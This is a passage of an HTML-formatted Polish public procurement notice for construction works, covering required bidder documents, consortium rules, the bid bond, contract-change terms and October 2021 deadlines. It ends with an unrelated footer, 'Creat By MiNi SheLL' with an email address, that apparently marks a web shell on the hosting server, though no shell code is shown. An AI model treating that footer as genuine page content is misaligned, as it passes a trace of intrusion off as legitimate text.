wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności<br/>do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie<br/>oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – wypełniony<br/>załącznik nr 6 do SWZ - dokument w postaci elektronicznej lub poświadczenia zgodności cyfrowego<br/>odwzorowania z dokumentem w postaci papierowej opatrzony kwalifikowanym podpisem<br/>elektronicznym, podpisem zaufanym lub podpisem osobistym;<br/>2) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem<br/>terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z<br/>podaniem ich rodzaju, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały<br/>wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane<br/>należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone<br/>przez podmiot, na rzecz którego roboty budowlane zostały wykonywane, a jeżeli wykonawca z<br/>przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne dokumenty -<br/>załącznik nr 7 do SWZ - dokument w postaci elektronicznej lub poświadczenia zgodności cyfrowego<br/>odwzorowania z dokumentem w postaci papierowej opatrzony kwalifikowanym podpisem<br/>elektronicznym, podpisem zaufanym lub podpisem osobistym;<br/>Uwaga do pkt 2)<br/>Jeżeli wykonawca powołuje się na doświadczenie w realizacji robót budowlanych, wykonywanych<br/>wspólnie z innymi wykonawcami, wykaz o którym mowa, dotyczy robót budowlanych, w których<br/>wykonaniu wykonawca ten bezpośrednio uczestniczył;<br/>3) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności<br/>odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami -<br/>załącznik nr 8 do SWZ - dokument w postaci elektronicznej lub poświadczenia zgodności cyfrowego<br/>odwzorowania z dokumentem w postaci papierowej opatrzony kwalifikowanym podpisem<br/>elektronicznym, podpisem zaufanym lub podpisem osobistym;<br/>4) oświadczenie na temat wykształcenia i kwalifikacji zawodowych wykonawcy lub kadry kierowniczej<br/>wykonawcy - załącznik nr 9 do SWZ - dokument w postaci elektronicznej lub poświadczenia zgodności<br/>cyfrowego odwzorowania z dokumentem w postaci papierowej opatrzony kwalifikowanym podpisem<br/>elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/>Uwaga:<br/>Wykonawca zobowiązany jest przedłożyć Zamawiającemu przed podpisaniem umowy kserokopię<br/>wymaganych uprawnień osób wskazanych w wykazie osób, o którym mowa w pkt 3</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie żąda złożenia przedmiotowych środków dowodowych. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 4. Wykonawca zobowiązany jest składając ofertę załączyć do niej na platformie zakupowej następujące oświadczenie i dokumenty:<br/> 1) formularz oferty (załącznik nr 1 do SWZ);<br/> 2) gwarancję lub poręczenie, jeżeli wykonawca wnosi wadium w innej formie niż pieniądz,<br/> 3) oświadczenie wykonawcy składane na podstawie art. 125 ust. 1 ustawy Pzp, dotyczące spełniania warunków udziału w postępowaniu oraz braku podstaw wykluczenia z postępowania (załącznik nr 2 do SWZ);<br/> 4) oświadczenie podmiotu na którego zasoby wykonawca się powołuje dotyczące spełniania warunków udziału w postępowaniu oraz braku podstaw wykluczenia z postępowania składane na podstawie art. 125 ust. 1 ustawy Pzp, dotyczące przesłanek wykluczenia z postępowania (załącznik nr nr 3 do SWZ) – jeżeli dotyczy,<br/> 5) zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia (załącznik nr 4 do SWZ) / jeśli dotyczy<br/> 6) oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia składane na podstawie art. 117 ust. 4 ustawy Pzp dotyczące robót budowlanych, które wykonają poszczególni Wykonawcy (załącznik nr 5 do SWZ) / jeśli dotyczy<br/> 7) pełnomocnictwo lub inny dokument określający zakres umocowania do reprezentowania wykonawcy, treść pełnomocnictwa musi jednoznacznie określać czynności, co do wykonywania których pełnomocnik jest upoważniony, o ile ofertę składa pełnomocnik lub przedstawiciel wykonawcy;<br/> 8) uproszczony kosztorys ofertowy<br/>UWAGA! Uproszczony kosztorys ofertowy w przypadku jego niezłożenia, nie podlega uzupełnieniu na podstawie art. 128 ust. 1 ustawy Pzp. Oferta wykonawcy, który nie złoży tego dokumentu podlegać będzie odrzuceniu na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp – jej treść jest niezgodna z warunkami zamówienia, z zastrzeżeniem art. 223 ust. 2 pkt 3 ustawy Pzp. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający żąda od wykonawców wniesienia wadium w kwocie:<br/>17.000,00 zł (słownie: siedemnaście tysięcy złotych i 00/100) <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy ubiegający się wspólnie o udzielenie zamówienia (Konsorcjum)<br/>17. Zamawiający nie określa szczególnego sposobu spełniania przez wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia, warunków udziału w postępowaniu, o których mowa<br/>w ust. 2-3.<br/>18. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia, wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z wykonawców, którzy wykonają roboty budowlane, do realizacji których te<br/>zdolności są wymagane.<br/>19. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni wykonawcy -załącznik nr 5 do SWZ - dokument w postaci elektronicznej lub poświadczenia zgodności<br/>cyfrowego odwzorowania z dokumentem w postaci papierowej opatrzony kwalifikowanym<br/>podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/>20. Zamawiający określa wymagania związane z realizacją zamówienia przez wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia, w sposób określony w ust. 18.<br/>7. Wykonawcy ubiegający się wspólnie o zamówienie:<br/>1) w przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenia<br/>składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Dokumenty te<br/>potwierdzają spełnienie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w<br/>zakresie, w którym każdy z wykonawców wykazuje spełnienie warunków udziału w<br/>postępowaniu oraz brak podstaw wykluczenia;<br/>2) wykonawcy wspólnie ubiegający się o udzielenie zamówienie ustanawiają pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego;<br/>3) pełnomocnictwo, o którym mowa w pkt 2 musi znajdować się w ofercie wspólnej<br/>wykonawców; pełnomocnictwo musi być złożone w ofercie w postaci elektronicznej lub<br/>poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej<br/>opatrzony kwalifikowanym podpisem elektronicznym, podpisem zaufanym, podpisem osobistym.<br/>Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej, może<br/>dokonać również notariusz;<br/>4) udzielone pełnomocnictwo musi upoważniać do działania w imieniu wykonawcy a treść<br/>pełnomocnictwa musi jednoznacznie określać czynności, co do wykonywania których<br/>pełnomocnik jest upoważniony w przypadku, gdy jest to osoba upoważniona do<br/>reprezentowania wykonawcy zgodnie z wymogami obowiązującego prawa;<br/>5) pełnomocnik pozostaje w kontakcie z zamawiającym w toku postępowania i do niego<br/>zamawiający kieruje informacje, korespondencję, itp.;<br/>6) oferta wspólna, składana przez dwóch lub więcej wykonawców, powinna spełniać<br/>następujące wymagania:<br/>a) oferta wspólna powinna być sporządzona zgodnie z SWZ;<br/>b) sposób składania dokumentów w ofercie wspólnej:<br/>c) dokumenty, dotyczące własnej firmy, takie jak np.: dokumenty i oświadczenia wymienione w<br/>§ 11 ust. 1 pkt 1, ust. 4 pkt 1 – składa każdy z wykonawców składających ofertę wspólną we<br/>własnym imieniu;<br/>d) dokumenty wspólne takie jak: formularz oferty; uproszczony kosztorys ofertowy; dokumenty i<br/>oświadczenia wymienione w § 11 ust. 1 pkt 2, ust. 2-3, ust. 4 pkt 2-4 SWZ - składa pełnomocnik<br/>wykonawców w imieniu wszystkich wykonawców składających ofertę wspólną, bądź wykonawcy<br/>wspólnie w imieniu każdego z wykonawców,<br/>7) wspólnicy spółki cywilnej są traktowani jak wykonawcy składający ofertę wspólną i mają do<br/>nich zastosowanie zasady określone w pkt 1-6;<br/>8) jeżeli oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, została<br/>wybrana, zamawiający żąda przed zawarciem umowy w sprawie zamówienia publicznego kopii<br/>umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Dopuszcza się możliwość dokonania zmian:1) terminu w wykonaniu przedmiotu umowy w przypadku nieprzewidzianych przez strony<br/>okoliczności niezawinionych przez Wykonawcę,2) terminu w wykonaniu przedmiotu umowy w<br/>przypadku konieczności dotrzymania reżimu technologicznego dla robót drogowych i warstw<br/>asfaltowych, tj. gdy nastąpi spadek temperatury uniemożliwiający wykonywanie nawierzchni<br/>asfaltowej zgodnie z technologią danego producenta określoną w karcie technologicznej lub<br/>wystąpi niedopuszczalna wilgotność podłoża wynikająca z technologii danego producenta<br/>zawarta w karcie technologicznej oraz przy uwzględnieniu wymagań wynikających z zapisów<br/>STWiOR,<br/>3) zmianę osób odpowiedzialnych za wykonanie zamówienia, pod warunkiem, że wystąpią<br/>następujące przypadki:<br/>a) śmierć, choroba lub inne zdarzenie losowe, utrata uprawnień,<br/>b) nie wywiązywanie się osób z obowiązków wynikających z umowy,<br/>c) rezygnacja tych osób z wykonywania swoich obowiązków;<br/>4) dopuszcza się zmianę osoby kierownika robót w trakcie realizacji umowy pod warunkiem<br/>posiadania przez nowego kierownika robót wymaganych przez Zamawiającego uprawnień,<br/>5) dopuszcza się zmianę albo rezygnację z podwykonawcy, na którego zasoby Wykonawca<br/>powoływał się w celu wykazania spełniania warunków udziału w postępowaniu. Wykonawca jest<br/>zobowiązany wykazać Zamawiającemu, że proponowany inny podwykonawca lub wykonawca<br/>samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o<br/>udzielenie zamówienia,<br/>6) dopuszcza się możliwość zlecenia w czasie trwania niniejszej umowy części zamówienia<br/>innym podwykonawcom, po wcześniejszym zgłoszeniu Zamawiającemu podzlecanych robót,<br/>7) dopuszcza się zmianę zakresu świadczenia oraz sposobu realizacji umowy w sytuacji zmiany<br/>przepisów Rozporz. Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r.<br/>w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE, opublikowania<br/>nowych interpretacji oraz wytycznych dotyczących ww. Rozporządzenia,<br/>8) dopuszcza się zmiany umowy zgodnie z art. 15r. ustawy o zmianie ustawy o szczególnych<br/>rozwiązaniach związanych z zapobieganiem, przeciwdziałaniem i zwalczaniem COVID-19,<br/>innych chorób zakaźnych oraz wywołanych nimi sytuacji kryzysowych oraz niektórych innych<br/>ustaw z dnia 31 marca 2020 r. (Dz. U. 2020 poz. 568).<br/>2. Dopuszcza się zmianę wynagrodzenia Wykonawcy w przypadku:<br/>1) zmiany stawki podatku od towarów i usług;<br/>2) zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art.2 ust.3-<br/>5 ustawy z dnia 10.10.2002 r. o minimalnym wynagrodzeniu za pracę;<br/>3) zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub<br/>wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne jeżeli zmiany te będą miały<br/>wpływ na koszty wykonania zamówienia przez Wykonawcę.<br/>3. Uzasadniony wniosek o zmianę wynagrodzenia, o którym mowa w ust. 2 zgłaszany jest w<br/>ciągu 30 dni od zaistnienia okoliczności, o których mowa w ust. 2. Uzasadnienie winno zawierać<br/>szczegółowe wyliczenie wpływu zmiany opisanej w ust. 2, na koszty wykonania zamówienia<br/>przez Wykonawcę.<br/>4. Dopuszcza się zmiany dotyczą realizacji dodatkowych robót budowlanych, których nie<br/>uwzględniono w zamówieniu podstawowym, o ile stały się niezbędne i zostały spełnione łącznie<br/>następujące warunki:<br/>1) zmiana Wyko. nie może zostać dokonana z powodów ekonomicznych lub technicznych, w<br/>szczególności dotyczących zamienności lub interoperacyjności wyposażenia lub instalacji<br/>zamówionych w ramach zamówienia podstawowego,<br/>2) zmiana Wykonawcy spowodowałaby istotną niedogodność lub znaczne zwiększenie kosztów<br/>dla Zam.,<br/>3) wzrost ceny spowodowany każdą kolejną zmianą nie przekracza 50% wartości pierwotnej<br/>umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-07 12:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/legionowo</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-07 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-11-05</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com